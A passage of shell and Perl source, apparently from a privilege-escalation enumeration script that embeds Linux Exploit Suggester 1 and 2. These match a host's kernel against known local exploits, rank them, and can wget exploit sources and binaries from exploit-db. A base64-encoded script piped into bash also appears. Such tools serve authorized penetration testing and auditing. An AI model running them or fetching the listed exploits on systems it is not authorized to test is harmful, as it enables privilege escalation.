# --checksec mode is standalone mode and is not applicable when one of -k | -u | -p | --cvelist-file switches are set
if [ "$opt_checksec_mode" = "true" ]; then
    [ "$opt_kernel_version" = "true" ] && exitWithErrMsg "Switches -k|--kernel and --checksec are mutually exclusive. Aborting."
    [ "$opt_uname_string" = "true" ] && exitWithErrMsg "Switches -u|--uname and --checksec are mutually exclusive. Aborting."
    [ "$opt_pkglist_file" = "true" ] && exitWithErrMsg "Switches -p|--pkglist-file and --checksec are mutually exclusive. Aborting."
fi

# extract kernel version and other OS info like distro name, distro version, etc. 3 possibilities here:
# case 1: --kernel set
if [ "$opt_kernel_version" == "true" ]; then
    # TODO: add kernel version number validation
    [ -z "$KERNEL" ] && exitWithErrMsg "Unrecognized kernel version given. Aborting."
    ARCH=""
    OS=""

    # do not perform additional checks on current machine
    opt_skip_more_checks=true

    # do not consider current OS
    getPkgList "" "$PKGLIST_FILE"

# case 2: --uname set
elif [ "$opt_uname_string" == "true" ]; then
    [ -z "$UNAME_A" ] && exitWithErrMsg "uname string empty. Aborting."
    parseUname "$UNAME_A"

    # do not perform additional checks on current machine
    opt_skip_more_checks=true

    # do not consider current OS
    getPkgList "" "$PKGLIST_FILE"

# case 3: --cvelist-file mode
elif [ "$opt_cvelist_file" = "true" ]; then

    # get kernel configuration in this mode
    [ "$opt_skip_more_checks" = "false" ] && getKernelConfig

# case 4: --checksec mode
elif [ "$opt_checksec_mode" = "true" ]; then

    # this switch is not applicable in this mode
    opt_skip_more_checks=false

    # get kernel configuration in this mode
    getKernelConfig
    [ -z "$KCONFIG" ] && echo "WARNING. Kernel Config not found on the system results won't be complete."

    # launch checksec mode
    checksecMode

    exit 0

# case 5: no --uname | --kernel | --cvelist-file | --checksec set
else

    # --pkglist-file NOT provided: take all info from current machine
    # case for vanilla execution: ./linux-exploit-suggester.sh
    if [ "$opt_pkglist_file" == "false" ]; then
        UNAME_A=$(uname -a)
        [ -z "$UNAME_A" ] && exitWithErrMsg "uname string empty. Aborting."
        parseUname "$UNAME_A"

        # get kernel configuration in this mode
        [ "$opt_skip_more_checks" = "false" ] && getKernelConfig

        # extract distribution version from /etc/os-release OR /etc/lsb-release
        [ -n "$OS" -a "$opt_skip_more_checks" = "false" ] && DISTRO=$(grep -s -E '^DISTRIB_RELEASE=|^VERSION_ID=' /etc/*-release | cut -d'=' -f2 | head -1 | tr -d '"')

        # extract package listing from current OS
        getPkgList "$OS" ""

    # --pkglist-file provided: only consider userspace exploits against provided package listing
    else
        KERNEL=""
        #TODO: extract machine arch from package listing
        ARCH=""
        unset EXPLOITS
        declare -A EXPLOITS
        getPkgList "" "$PKGLIST_FILE"

        # additional checks are not applicable for this mode
        opt_skip_more_checks=true
    fi
fi

echo
echo -e "${bldwht}Available information:${txtrst}"
echo
[ -n "$KERNEL" ] && echo -e "Kernel version: ${txtgrn}$KERNEL${txtrst}" || echo -e "Kernel version: ${txtred}N/A${txtrst}"
echo "Architecture: $([ -n "$ARCH" ] && echo -e "${txtgrn}$ARCH${txtrst}" || echo -e "${txtred}N/A${txtrst}")"
echo "Distribution: $([ -n "$OS" ] && echo -e "${txtgrn}$OS${txtrst}" || echo -e "${txtred}N/A${txtrst}")"
echo -e "Distribution version: $([ -n "$DISTRO" ] && echo -e "${txtgrn}$DISTRO${txtrst}" || echo -e "${txtred}N/A${txtrst}")"

echo "Additional checks (CONFIG_*, sysctl entries, custom Bash commands): $([ "$opt_skip_more_checks" == "false" ] && echo -e "${txtgrn}performed${txtrst}" || echo -e "${txtred}N/A${txtrst}")"

if [ -n "$PKGLIST_FILE" -a -n "$PKG_LIST" ]; then
    pkgListFile="${txtgrn}$PKGLIST_FILE${txtrst}"
elif [ -n "$PKGLIST_FILE" ]; then
    pkgListFile="${txtred}unrecognized file provided${txtrst}"
elif [ -n "$PKG_LIST" ]; then
    pkgListFile="${txtgrn}from current OS${txtrst}"
fi

echo -e "Package listing: $([ -n "$pkgListFile" ] && echo -e "$pkgListFile" || echo -e "${txtred}N/A${txtrst}")"

# handle --kernelspacy-only & --userspace-only filter options
if [ "$opt_kernel_only" = "true" -o -z "$PKG_LIST" ]; then
    unset EXPLOITS_USERSPACE
    declare -A EXPLOITS_USERSPACE
fi

if [ "$opt_userspace_only" = "true" ]; then
    unset EXPLOITS
    declare -A EXPLOITS
fi

echo
echo -e "${bldwht}Searching among:${txtrst}"
echo
echo "${#EXPLOITS[@]} kernel space exploits"
echo "${#EXPLOITS_USERSPACE[@]} user space exploits"
echo

echo -e "${bldwht}Possible Exploits:${txtrst}"
echo

# start analysis
j=0
for EXP in "${EXPLOITS[@]}" "${EXPLOITS_USERSPACE[@]}"; do

    # create array from current exploit here doc and fetch needed lines
    i=0
    # ('-r' is used to not interpret backslash used for bash colors)
    while read -r line
    do
        arr[i]="$line"
        i=$((i + 1))
    done <<< "$EXP"

    NAME="${arr[0]}" && NAME="${NAME:6}"
    REQS="${arr[1]}" && REQS="${REQS:6}"
    TAGS="${arr[2]}" && TAGS="${TAGS:6}"
    RANK="${arr[3]}" && RANK="${RANK:6}"

    # split line with requirements & loop thru all reqs one by one & check whether it is met
    IFS=',' read -r -a array <<< "$REQS"
    REQS_NUM=${#array[@]}
    PASSED_REQ=0
    for REQ in "${array[@]}"; do
        if (checkRequirement "$REQ" "${array[0]}"); then
            PASSED_REQ=$(($PASSED_REQ + 1))
        else
            break
        fi
    done

    # execute for exploits with all requirements met
    if [ $PASSED_REQ -eq $REQS_NUM ]; then

        # additional requirement for --cvelist-file mode: check if CVE associated with the exploit is on the CVELIST_FILE
        if [ "$opt_cvelist_file" = "true" ]; then

            # extract CVE(s) associated with given exploit (also translates ',' to '|' for easy handling multiple CVEs case - via extended regex)
            cve=$(echo "$NAME" | grep '.*\[.*\].*' | cut -d 'm' -f2 | cut -d ']' -f1 | tr -d '[' | tr "," "|")
            #echo "CVE: $cve"

            # check if it's on CVELIST_FILE list, if no move to next exploit
            [ ! $(cat "$CVELIST_FILE" | grep -E "$cve") ] && continue
        fi

        # process tags and highlight those that match current OS (only for deb|ubuntu|RHEL and if we know distro version - direct mode)
        tags=""
        if [ -n "$TAGS" -a -n "$OS" ]; then
            IFS=',' read -r -a tags_array <<< "$TAGS"
            TAGS_NUM=${#tags_array[@]}

            # bump RANK slightly (+1) if we're in '--uname' mode and there's a TAG for OS from uname string
            [ "$(echo "${tags_array[@]}" | grep "$OS")" -a "$opt_uname_string" == "true" ] && RANK=$(($RANK + 1))

            for TAG in "${tags_array[@]}"; do
                tag_distro=$(echo "$TAG" | cut -d'=' -f1)
                tag_distro_num_all=$(echo "$TAG" | cut -d'=' -f2)
                # in case of tag of form: 'ubuntu=16.04{kernel:4.4.0-21} remove kernel versioning part for comparision
                tag_distro_num="${tag_distro_num_all%{*}"

                # we're in '--uname' mode OR (for normal mode) if there is distro version match
                if [ "$opt_uname_string" == "true" -o \( "$OS" == "$tag_distro" -a "$(echo "$DISTRO" | grep -E "$tag_distro_num")" \) ]; then

                    # bump current exploit's rank by 2 for distro match (and not in '--uname' mode)
                    [ "$opt_uname_string" == "false" ] && RANK=$(($RANK + 2))

                    # get name (kernel or package name) and version of kernel/pkg if provided:
                    tag_pkg=$(echo "$tag_distro_num_all" | cut -d'{' -f 2 | tr -d '}' | cut -d':' -f 1)
                    tag_pkg_num=""
                    [ $(echo "$tag_distro_num_all" | grep '{') ] && tag_pkg_num=$(echo "$tag_distro_num_all" | cut -d'{' -f 2 | tr -d '}' | cut -d':' -f 2)

                    #[ -n "$tag_pkg_num" ] && echo "tag_pkg_num: $tag_pkg_num; kernel: $KERNEL_ALL"

                    # if pkg/kernel version is not provided:
                    if [ -z "$tag_pkg_num" ]; then
                        [ "$opt_uname_string" == "false" ] && TAG="${lightyellow}[ ${TAG} ]${txtrst}"

                    # kernel version provided, check for match:
                    elif [ -n "$tag_pkg_num" -a "$tag_pkg" = "kernel" ]; then
                        if [ $(echo "$KERNEL_ALL" | grep -E "${tag_pkg_num}") ]; then
                            # kernel version matched - bold highlight
                            TAG="${yellow}[ ${TAG} ]${txtrst}"

                            # bump current exploit's rank additionally by 3 for kernel version regex match
                            RANK=$(($RANK + 3))
                        else
                            [ "$opt_uname_string" == "false" ] && TAG="${lightyellow}[ $tag_distro=$tag_distro_num ]${txtrst}{kernel:$tag_pkg_num}"
                        fi

                    # pkg version provided, check for match (TBD):
                    elif [ -n "$tag_pkg_num" -a -n "$tag_pkg"  ]; then
                        TAG="${lightyellow}[ $tag_distro=$tag_distro_num ]${txtrst}{$tag_pkg:$tag_pkg_num}"
                    fi

                fi

                # append current tag to tags list
                tags="${tags}${TAG},"
            done
            # trim ',' added by above loop
            [ -n "$tags" ] && tags="${tags%?}"
        else
            tags="$TAGS"
        fi

        # insert the matched exploit (with calculated Rank and highlighted tags) to arrary that will be sorted
        EXP=$(echo "$EXP" | sed -e '/^Name:/d' -e '/^Reqs:/d' -e '/^Tags:/d')
        exploits_to_sort[j]="${RANK}Name: ${NAME}D3L1mReqs: ${REQS}D3L1mTags: ${tags}D3L1m$(echo "$EXP" | sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/D3L1m/g')"
        ((j++))
    fi
done

# sort exploits based on calculated Rank
IFS=$'\n'
SORTED_EXPLOITS=($(sort -r <<<"${exploits_to_sort[*]}"))
unset IFS

# display sorted exploits
for EXP_TEMP in "${SORTED_EXPLOITS[@]}"; do

	RANK=$(echo "$EXP_TEMP" | awk -F'Name:' '{print $1}')

	# convert entry back to canonical form
	EXP=$(echo "$EXP_TEMP" | sed 's/^[0-9]//g' | sed 's/D3L1m/\n/g')

	# create array from current exploit here doc and fetch needed lines
    i=0
    # ('-r' is used to not interpret backslash used for bash colors)
    while read -r line
    do
        arr[i]="$line"
        i=$((i + 1))
    done <<< "$EXP"

    NAME="${arr[0]}" && NAME="${NAME:6}"
    REQS="${arr[1]}" && REQS="${REQS:6}"
    TAGS="${arr[2]}" && tags="${TAGS:6}"

	EXPLOIT_DB=$(echo "$EXP" | grep "exploit-db: " | awk '{print $2}')
	analysis_url=$(echo "$EXP" | grep "analysis-url: " | awk '{print $2}')
	ext_url=$(echo "$EXP" | grep "ext-url: " | awk '{print $2}')
	comments=$(echo "$EXP" | grep "Comments: " | cut -d' ' -f 2-)
	reqs=$(echo "$EXP" | grep "Reqs: " | cut -d' ' -f 2)

	# exploit name without CVE number and without commonly used special chars
	name=$(echo "$NAME" | cut -d' ' -f 2- | tr -d ' ()/')

	bin_url=$(echo "$EXP" | grep "bin-url: " | awk '{print $2}')
	src_url=$(echo "$EXP" | grep "src-url: " | awk '{print $2}')
	[ -z "$src_url" ] && [ -n "$EXPLOIT_DB" ] && src_url="https://www.exploit-db.com/download/$EXPLOIT_DB"
	[ -z "$src_url" ] && [ -z "$bin_url" ] && exitWithErrMsg "'src-url' / 'bin-url' / 'exploit-db' entries are all empty for '$NAME' exploit - fix that. Aborting."

	if [ -n "$analysis_url" ]; then
        details="$analysis_url"
	elif $(echo "$src_url" | grep -q 'www.exploit-db.com'); then
        details="https://www.exploit-db.com/exploits/$EXPLOIT_DB/"
	elif [[ "$src_url" =~ ^.*tgz|tar.gz|zip$ && -n "$EXPLOIT_DB" ]]; then
        details="https://www.exploit-db.com/exploits/$EXPLOIT_DB/"
	else
        details="$src_url"
	fi

	# skip DoS by default
	dos=$(echo "$EXP" | grep -o -i "(dos")
	[ "$opt_show_dos" == "false" ] && [ -n "$dos" ] && continue

	# handles --fetch-binaries option
	if [ $opt_fetch_bins = "true" ]; then
        for i in $(echo "$EXP" | grep "bin-url: " | awk '{print $2}'); do
            [ -f "${name}_$(basename $i)" ] && rm -f "${name}_$(basename $i)"
            wget -q -k "$i" -O "${name}_$(basename $i)"
        done
    fi

	# handles --fetch-sources option
	if [ $opt_fetch_srcs = "true" ]; then
        [ -f "${name}_$(basename $src_url)" ] && rm -f "${name}_$(basename $src_url)"
        wget -q -k "$src_url" -O "${name}_$(basename $src_url)" &
    fi

    # display result (short)
	if [ "$opt_summary" = "true" ]; then
	[ -z "$tags" ] && tags="-"
	echo -e "$NAME || $tags || $src_url"
	continue
	fi

# display result (standard)
	echo -e "[+] $NAME"
	echo -e "\n   Details: $details"
        echo -e "   Exposure: $(displayExposure $RANK)"
        [ -n "$tags" ] && echo -e "   Tags: $tags"
        echo -e "   Download URL: $src_url"
        [ -n "$ext_url" ] && echo -e "   ext-url: $ext_url"
        [ -n "$comments" ] && echo -e "   Comments: $comments"

        # handles --full filter option
        if [ "$opt_full" = "true" ]; then
            [ -n "$reqs" ] && echo -e "   Requirements: $reqs"

            [ -n "$EXPLOIT_DB" ] && echo -e "   exploit-db: $EXPLOIT_DB"

            author=$(echo "$EXP" | grep "author: " | cut -d' ' -f 2-)
            [ -n "$author" ] && echo -e "   author: $author"
        fi

        echo

done
"
+ echo $les_b64 | base64 -d | bash | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "\[CVE" -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,\[CVE-[0-9]+-[0-9]+\].*,${SED_RED},g"
+ echo ""
+fi
+
+if [ "$(command -v perl 2>/dev/null)" ]; then
+ print_2title "Executing Linux Exploit Suggester 2"
+ print_info "https://github.com/jondonas/linux-exploit-suggester-2"
+ les2_b64="#!/usr/bin/perl
use strict;
use warnings;
use Getopt::Std;

our $VERSION = '2';

my %opts;
getopts( 'k:hd', \%opts );
if (exists $opts{h}) {
    usage();
    exit;
};

print_banner();
my ( $khost, $is_partial ) = get_kernel();
print "  Local Kernel: \e[00;33m$khost\e[00m\n";

my %exploits = get_exploits();
print '  Searching ' . scalar keys(%exploits) . " exploits...\n\n";
print "  \e[1;35mPossible Exploits\e[00m\n";

my $count = 1;
my @applicable = ();
EXPLOIT:
foreach my $key ( sort keys %exploits ) {
    foreach my $kernel ( @{ $exploits{$key}{vuln} } ) {

        if (     $khost eq $kernel
              or ( $is_partial and index($kernel,$khost) == 0 )
        ) {
            $exploits{$key}{key} = $key;
            push(@applicable, $exploits{$key});
            print "  \e[00;33m[\e[00m\e[00;31m$count\e[00m\e[00;33m]\e[00m ";
            print "\e[00;33m$key\e[00m";
            print " \e[00;33m($kernel)\e[00m" if $is_partial;

            my $alt = $exploits{$key}{alt};
            my $cve = $exploits{$key}{cve};
            my $mlw = $exploits{$key}{mil};
            if ( $alt or $cve ) {
                print "\n";
            }
            if ( $alt ) { print "      Alt: $alt "; }
            if ( $cve ) { print "      CVE-$cve"; }
            if ( $mlw ) { print "\n      Source: $mlw"; }
            print "\n";
            $count += 1;
            next EXPLOIT;
        }
    }
}
print "\n";

if (!@applicable) {
    print "  No exploits are available for this kernel version\n\n";
    exit;
}

if (exists $opts{d}) {
    print "  \e[1;36mExploit Download\e[00m\n";
    print "  (Download all: \e[00;33m'a'\e[00m / Individually: \e[00;33m'2,4,5'\e[00m ";
    print "/ Exit: \e[00;33m^c\e[00m)\n";
    print "  Select exploits to download: ";

    while (1) {
        my $input = <STDIN>;
        $input =~ s/\s+//g;

        if ($input =~ /^a$/) {
            my @selected = ();
            for (my $i=1; $i <= scalar @applicable; $i++) {
               push(@selected, $i);
            }
            download_exploits(\@selected, \@applicable);
            last;
        }
        elsif ($input =~ /^(0|[1-9][0-9]*)(,(0|[1-9][0-9]*))*$/) {
            my @selected = uniq(split(',', $input));
            @selected = sort {$a <=> $b} @selected;
            if ($selected[0] > 0 && $selected[-1] <= scalar @applicable) {
                download_exploits(\@selected, \@applicable);
                last;
            }
            else {
               print "  \e[00;31mInput is out of range.\e[00m Select exploits to download: ";
            }
        }
        else {
            print "  \e[00;31mInvalid input.\e[00m Select exploits to download: ";
        }
    }
};
exit;

######################
## extra functions  ##
######################

sub get_kernel {
    my $khost = '';

    if ( exists $opts{k} ) {
        $khost = $opts{k};
    }
    else {
        $khost = `uname -r |cut -d"-" -f1`;
        chomp $khost;
    }

    if (!defined $khost || !($khost =~ /^[0-9]+([.][0-9]+)*$/)) {
        print "  \e[00;31mSpecified kernel is in the wrong format\e[00m\n";
        print "  Try a kernel format like this: 3.2.0\n\n";
        exit;
    }

    # partial kernels might be provided by the user,
    # such as '2.4' or '2.6.'
    my $is_partial = $khost =~ /^\d+\.\d+\.\d?/ ? 0 : 1;
    return ( $khost, $is_partial );
}

sub download_exploits {
    my ($sref, $aref) = @_;
    my @selected = @{ $sref };
    my @applicable = @{ $aref };
    my $exploit_base = "www.exploit-db.com/exploits";
    my $download_base = "https://www.exploit-db.com/raw/";
    print "\n";

    foreach my $num (@selected) {
        my $mil = $applicable[$num-1]{mil};
        next if (!defined $mil);
        my ($exploit_num) = ($mil =~ /^.*\/([1-9][0-9]*)\/?$/);
        
        if ($exploit_num && index($mil, $exploit_base) != -1) {
            my $url = $download_base . $exploit_num;
            my $file = "exploit_$applicable[$num-1]{key}";
            print "  Downloading \e[00;33m$url\e[00m -> \e[00;33m$file\e[00m\n";
            system "wget $url -O $file > /dev/null 2>&1";
        }
        else {
            print "  No exploit code available for \e[00;33m$applicable[$num-1]{key}\e[00m\n"; 
        }
    }
    print "\n";
}

sub uniq {
    my %seen;
    grep !$seen{$_}++, @_;
}

sub usage {
print_banner();
print "  \e[00;35mUsage:\e[00m $0 [-h] [-k kernel] [-d]\n\n";
print "  \e[00;33m[\e[00m\e[00;31m-h\e[00m\e[00;33m]\e[00m Help (this message)\n";
print "  \e[00;33m[\e[00m\e[00;31m-k\e[00m\e[00;33m]\e[00m Kernel number (eg. 2.6.28)\n";
print "  \e[00;33m[\e[00m\e[00;31m-d\e[00m\e[00;33m]\e[00m Open exploit download menu\n\n";

print "  You can also provide a partial kernel version (eg. 2.4)\n";
print "  to see all exploits available.\n\n";
}

sub print_banner {
print "\n\e[00;33m  #############################\e[00m\n";
print "\e[1;31m    Linux Exploit Suggester $VERSION\e[00m\n";
print "\e[00;33m  #############################\e[00m\n\n";
}

sub get_exploits {
  return (
    'w00t' => {
        vuln => [
            '2.4.10', '2.4.16', '2.4.17', '2.4.18',
            '2.4.19', '2.4.20', '2.4.21',
        ]
    },
    'brk' => {
        vuln => [ '2.4.10', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
    },
    'ave' => { vuln => [ '2.4.19', '2.4.20' ] },

    'elflbl' => {
        vuln => ['2.4.29'],
        mil  => 'http://www.exploit-db.com/exploits/744',
    },

    'elfdump'      => { vuln => ['2.4.27'] },
    'elfcd'        => { vuln => ['2.6.12'] },
    'expand_stack' => { vuln => ['2.4.29'] },

    'h00lyshit' => {
        vuln => [
            '2.6.8',  '2.6.10', '2.6.11', '2.6.12',
            '2.6.13', '2.6.14', '2.6.15', '2.6.16',
        ],
        cve => '2006-3626',
        mil => 'http://www.exploit-db.com/exploits/2013',
    },

    'kdump' => { vuln => ['2.6.13'] },
    'km2'   => { vuln => [ '2.4.18', '2.4.22' ] },
    'krad' =>
      { vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ] },

    'krad3' => {
        vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ],
        mil => 'http://exploit-db.com/exploits/1397',
    },

    'local26' => { vuln => ['2.6.13'] },
    'loko'    => { vuln => [ '2.4.22', '2.4.23', '2.4.24' ] },

    'mremap_pte' => {
        vuln => [ '2.4.20', '2.2.24', '2.4.25', '2.4.26', '2.4.27' ],
        mil => 'http://www.exploit-db.com/exploits/160',
    },

    'newlocal' => { vuln => [ '2.4.17', '2.4.19' ] },
    'ong_bak'  => { vuln => ['2.6.5'] },
    'ptrace' =>
      { vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ] },
    'ptrace_kmod' => {
        vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
        cve  => '2007-4573',
    },
    'ptrace_kmod2' => {
        vuln => [
            '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31',
            '2.6.32', '2.6.33', '2.6.34',
        ],
        alt => 'ia32syscall,robert_you_suck',
        mil => 'http://www.exploit-db.com/exploits/15023',
        cve => '2010-3301',
    },
    'ptrace24' => { vuln => ['2.4.9'] },
    'pwned'    => { vuln => ['2.6.11'] },
    'py2'      => { vuln => [ '2.6.9', '2.6.17', '2.6.15', '2.6.13' ] },
    'raptor_prctl' => {
        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
        cve  => '2006-2451',
        mil => 'http://www.exploit-db.com/exploits/2031',
    },
    'prctl' => {
        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
        mil => 'http://www.exploit-db.com/exploits/2004',
    },
    'prctl2' => {
        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
        mil => 'http://www.exploit-db.com/exploits/2005',
    },
    'prctl3' => {
        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
        mil => 'http://www.exploit-db.com/exploits/2006',
    },
    'prctl4' => {
        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
        mil => 'http://www.exploit-db.com/exploits/2011',
    },
    'remap'      => { vuln => ['2.4'] },
    'rip'        => { vuln => ['2.2'] },
    'stackgrow2' => { vuln => [ '2.4.29', '2.6.10' ] },
    'uselib24' => {
        vuln => [ '2.6.10', '2.4.17', '2.4.22', '2.4.25', '2.4.27', '2.4.29' ]
    },
    'newsmp'   => { vuln => ['2.6'] },
    'smpracer' => { vuln => ['2.4.29'] },
    'loginx'   => { vuln => ['2.4.22'] },
    'exp.sh'   => { vuln => [ '2.6.9', '2.6.10', '2.6.16', '2.6.13' ] },
    'vmsplice1' => {
        vuln => [
            '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
            '2.6.23', '2.6.24', '2.6.24.1',
        ],
        alt => 'jessica biel',
        cve => '2008-0600',
        mil => 'http://www.exploit-db.com/exploits/5092',
    },
    'vmsplice2' => {
        vuln => [ '2.6.23', '2.6.24' ],
        alt  => 'diane_lane',
        cve  => '2008-0600',
        mil  => 'http://www.exploit-db.com/exploits/5093',
    },
    'vconsole' => {
        vuln => ['2.6'],
        cve  => '2009-1046',
    },
    'sctp' => {
        vuln => ['2.6.26'],
        cve  => '2008-4113',
    },
    'ftrex' => {
        vuln => [
            '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16',
            '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
        ],
        cve => '2008-4210',
        mil => 'http://www.exploit-db.com/exploits/6851',
    },
    'exit_notify' => {
        vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
        mil => 'http://www.exploit-db.com/exploits/8369',
    },
    'udev' => {
        vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
        alt  => 'udev <1.4.1',
        cve  => '2009-1185',
        mil => 'http://www.exploit-db.com/exploits/8478',
    },

    'sock_sendpage2' => {
        vuln => [
            '2.4.4',  '2.4.5',  '2.4.6',  '2.4.7',  '2.4.8',  '2.4.9',
            '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
            '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
            '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
            '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
            '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0',  '2.6.1',
            '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',  '2.6.6',  '2.6.7',
            '2.6.8',  '2.6.9',  '2.6.10', '2.6.11', '2.6.12', '2.6.13',
            '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
            '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
            '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
        ],
        alt => 'proto_ops',
        cve => '2009-2692',
        mil => 'http://www.exploit-db.com/exploits/9436',
    },

    'sock_sendpage' => {
        vuln => [
            '2.4.4',  '2.4.5',  '2.4.6',  '2.4.7',  '2.4.8',  '2.4.9',
            '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
            '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
            '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
            '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
            '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0',  '2.6.1',
            '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',  '2.6.6',  '2.6.7',
            '2.6.8',  '2.6.9',  '2.6.10', '2.6.11', '2.6.12', '2.6.13',
            '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
            '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
            '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
        ],
        alt => 'wunderbar_emporium',
        cve => '2009-2692',
        mil => 'http://www.exploit-db.com/exploits/9435',
    },
    'udp_sendmsg_32bit' => {
        vuln => [
            '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',  '2.6.6',
            '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11', '2.6.12',
            '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18',
            '2.6.19',
        ],
        cve => '2009-2698',
        mil =>
          'http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c',
    },
    'pipe.c_32bit' => {
        vuln => [
            '2.4.4',  '2.4.5',  '2.4.6',  '2.4.7',  '2.4.8',  '2.4.9',
            '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
            '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
            '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
            '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
            '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.15', '2.6.16',
            '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
            '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28',
            '2.6.29', '2.6.30', '2.6.31',
        ],
        cve => '2009-3547',
        mil =>
          'http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c',
    },
    'do_pages_move' => {
        vuln => [
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31',
        ],
        alt => 'sieve',
        cve => '2010-0415',
        mil => 'Spenders Enlightenment',
    },
    'reiserfs' => {
        vuln => [
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
        ],
        cve => '2010-1146',
        mil => 'http://www.exploit-db.com/exploits/12130',
    },
    'can_bcm' => {
        vuln => [
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        cve => '2010-2959',
        mil => 'http://www.exploit-db.com/exploits/14814',
    },
    'rds' => {
        vuln => [
            '2.6.30', '2.6.31', '2.6.32', '2.6.33',
            '2.6.34', '2.6.35', '2.6.36',
        ],
        mil => 'http://www.exploit-db.com/exploits/15285',
        cve => '2010-3904',
    },
    'half_nelson1' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        alt => 'econet',
        cve => '2010-3848',
        mil => 'http://www.exploit-db.com/exploits/17787',
    },
    'half_nelson2' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        alt => 'econet',
        cve => '2010-3850',
        mil => 'http://www.exploit-db.com/exploits/17787',
    },
    'half_nelson3' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
